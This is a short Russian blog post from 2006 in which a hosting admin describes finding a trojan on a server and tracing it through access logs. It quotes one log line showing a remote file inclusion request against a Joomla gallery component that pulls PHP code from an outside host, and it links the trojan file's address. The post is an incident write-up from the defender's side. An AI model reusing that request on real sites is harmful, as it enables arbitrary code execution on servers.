![[info]](https://lj.kraslan.strangled.net/img/userinfo.gif) kernel | 13 Сент, 2006 18:36 Даже интересно, что это такое?
http://source.webcindario.com/nasti.txt
Точнее, что такое понятно, непонятно откуда :)
Точнее, более интересно, как этот троян попал на хостинг ^_^
P.S. Всё, понятно. Как всегда помогли логи:
193.88.241.210 - - [13/Sep/2006:17:51:52 +0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://source.webcindario.com/ale.txt? HTTP/1.0" 200 17791
85.90.137.142
83.82.220.55
212.227.109.31
Четыре чередующихся прокси и cron.
Уязвимость убрал сразу на нескольких уровнях, точнее она и была-то часа два, до этого passthru был полностью запрещен.
Но уязвимость крутая, выполнение произвольного PHP кода при отключенном safe_mode (для данного домена) ^_^
То, что использовали для запуска безопасного(в данном случае) бота - удача. Read Comments |
